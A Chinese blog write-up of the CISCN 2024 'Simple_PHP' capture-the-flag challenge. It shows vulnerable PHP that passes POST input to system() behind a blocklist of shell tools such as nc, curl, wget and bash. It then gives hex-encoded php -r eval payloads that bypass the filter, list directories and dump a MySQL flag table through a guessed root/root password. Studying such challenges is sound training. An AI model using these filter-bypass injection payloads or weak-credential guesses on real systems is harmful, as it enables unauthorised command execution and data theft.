CISCN 2024 web Simple_PHP

已于 2024-05-28 16:03:14 修改
阅读量813 收藏 13
点赞数 6
文章标签: 笔记
于 2024-05-19 23:25:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74428315/article/details/139050718
版权

属于web签到了

<?php

ini_set('open_basedir', '/var/www/html/');

error_reporting(0);

if(isset($_POST['cmd'])){

    $cmd = escapeshellcmd($_POST['cmd']); 

     if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {

         system($cmd);

}

}

show_source(__FILE__);

?>

我第一次见到escapeshellcmd()这个函数,不过可以搜一搜就知道了

观察代码并没有发现禁用php,尝试用php -r 去执行php命令

首先去访问phpinfo,发现可以,但通过一些简单的绕过尝试发现不行

因为linux好多指令被禁用了,考虑16进制-2进制

同样eval函数也没有ban,但base64ban了用到16进制,因为过滤了引号,用到了截断绕过。substr函数

用到hex2bin(substr(_16进制,1)),保证hex2bin能够处理16进制值

OK

去构造ls

也就是说16进制=6563686f20606c73202f60

ae784390c4a9493390d0e36f8b3ba28a.png

发现不存在flag的提示,考虑数据库(经验所得)

那么就得去想办法知道数据库的username和password

那么一般这种情况去尝试弱口令(有些数据库或者后台直接弱口令就出来了)

尝试root 123

发现不行

尝试root root 发现可以也就是我们可以尝试拿到库名和表名也就是说hex2bin(substr(_16进制,1)),这里面的16进制为6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d65202773686f77206461746162617365733b2760(库名)

1732f1540ef74f8c9cb199b2b4ef96fe.png

拿到PHP_CMS(曾经做校赛的时候,遇到渗透题,sqlmap跑看到有PHP_CMS,没继续往下搜,觉得方法不对,然后就弱口令进到后台拿到flag直接非预期hhh,其实当时flag就在PHP_CMS里。。。题外话了),所以这次看到PHP_CMS直接往里面看

16进制=6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b2760(表名)

669502ce702049c090d7508aa221ac7c.png

Ok这下拿到了表名,一眼丁真,

“F1ag_Se3Re7”

16进制=6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73656c656374202a2066726f6d20463161675f5365335265373b27603b

payload:cmd=php-reval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));

(记得是POST提交)!!

8d3cea238b0541e993bfcb85e712e578.png

7r4ck3r
关注
linux渗透测试常用命令
08-07 135
【代码】linux渗透测试常用命令。
[AI in security]-216 开源威胁情报线索【仅供学习研究使用】
08-08 1567
暗网大屏:https://gcokedsa123.grafana.net/dashboard/snapshot/2OJ9OtmtitwiGcIqwIVhvzgmTKDBtTkF?9.深信服安全中心 https://wiki.sec.sangfor.com.cn/index/abroad。微步测绘:https://x.threatbook.com/v5/mapping。火花:https://ti.venuseye.com.cn/#/home。
第十七届全国大学生信息安全竞赛创新实践能力赛初赛(CISCN-2024部分WP)
Welcome To Myon'Blog !
05-20 2488
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
iscc2024 web部分题解
2301_78871310的博客
05-27 244
人们的好比赛
simple_php(攻防世界)
2301_80548709的博客
11-08 697
4.其次,对于$b有一个判定的函数is_numeric(),即如果$b为纯数字就会退出程序,同时满足$b>1234,所以我们可以来一个字符串$b=4567abc(在> <符号比较时,数字与字符串比较,会先将字符串转化为数字在比较)这时候这需要引入新的知识:(1)$a输入布尔值true,非空数组,非空字符串,非零数字则可使$a判断为真;(2)当逻辑运算符“==”进行判断时,左边的若为字符串(第一个字符不为数字)=空值,且不能为数字,同时满足==左边转化后为0。我们需要输入a,b的值。
CISCN2024-Web方向题解
Err0r233的博客
05-21 2054
CISCN打烂了,几个题都是差一点就出,自己还是太菜了。
WebCISCN 2024初赛 题解(全)
uuzeray的博客
05-21 3725
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
usgs地震记录如何下载_用大叶草绘制USGS地震数据
weixin_26713521的博客
09-03 2244
usgs地震记录如何下载One of the many services provided by the US Geological Survey (USGS) is the monitoring and tracking of seismological events worldwide. I recently stumbled upon their earthquake datasets pr...
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 2787
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
48.网络安全渗透测试—[穷举篇11]—[webshell密码破解(asp/aspx/php)]
热门推荐
qwsn
08-07 99万+
我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、burpsuite2.0 webshell密码破解办法 1、目标1: `http://www.yijuhua.com/b.asp` 2、目标2:`http://www.yijuhua.com/b.php` 3、目标3:`http://www.yijuhua.com/b.aspx`
国赛ciscn2024-WP-re6-gdb-debug(伪随机数保护)
05-21
国赛ciscn2024-WP-re6-gdb_debug(伪随机数保护)
simple_php题解流程
qq_65240014的博客
02-03 670
下面就是$b的判断条件,要求b不能是一个数字,且b要大于1234,由于php的弱类型转化,这里需要在前面有一段数字大于1234,并在这段数字后面拼接字符来确保b不会被is_numeric()函数判定为数字,这样就有了b的值12345a。需要GET形式提交变量a,要求$a==0 and $a,这里使用==符号用到了php的弱类型相等,即弱比较只要求比较的两个值在转换类型后相等即可。而强类型相等符合===:强比较要求比较的两个值不仅是值相等,而且类型也必须相等。这里flag被拆成了两段,先看第一段。
2024全国大学生信息安全竞赛(ciscn)半决赛(西南赛区)Pwn题解
最新发布
返璞归真的博客
06-18 1239
2024全国大学生信息安全竞赛(ciscn)半决赛(西南赛区)Pwn题解
【命令执行--持续更新】
qq_74240553的博客
02-18 2183
CTFshow
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
qd520_1314的博客
04-14 802
一般来说,需要通过报错来获取信息,但是不管对name怎么fuzz,由于传参限制都无法报错。看了其他师傅的wp后才发现,可以使得name参数为空来报错。。。。报错信息中,有用的除了一些路径外,值得注意的是这几行无法ssti,也没什么用。又坐牢了一段时间,无奈之下又只能瞅一瞅师傅们的wp,好家伙,原来是空的,逗人玩呢。那就修改一下Admin的路由,用来获取admin的session拿着伪造的session去访问靶机的admin路由,提示我们用ssti,那就ssti。
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
Jay17的博客
05-19 4636
第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP
国赛练习(1)
weixin_74020633的博客
05-22 1093
转为16进制的字符串在用hex2bin函数转为acill码时,需要引号包裹,但是引号被过滤了,可以使用"_"来让16进制被识别为字符串,再用substr,把下划线去掉进行进制转换。open_basedir是php.ini中的配置文件,可以限制用户访问文件的范围,例如本题,就限制了用户在php脚本中只能访问/var/www/html下的文件。最后的正则匹配过滤了大部分的命令执行,还有一些符号,三个函数可以说过滤了很多绕过方式,编码绕过的话,有特殊字符会被转义,命令执行被正则过滤或者转义。
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
weixin_62467741的博客
05-22 1109
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值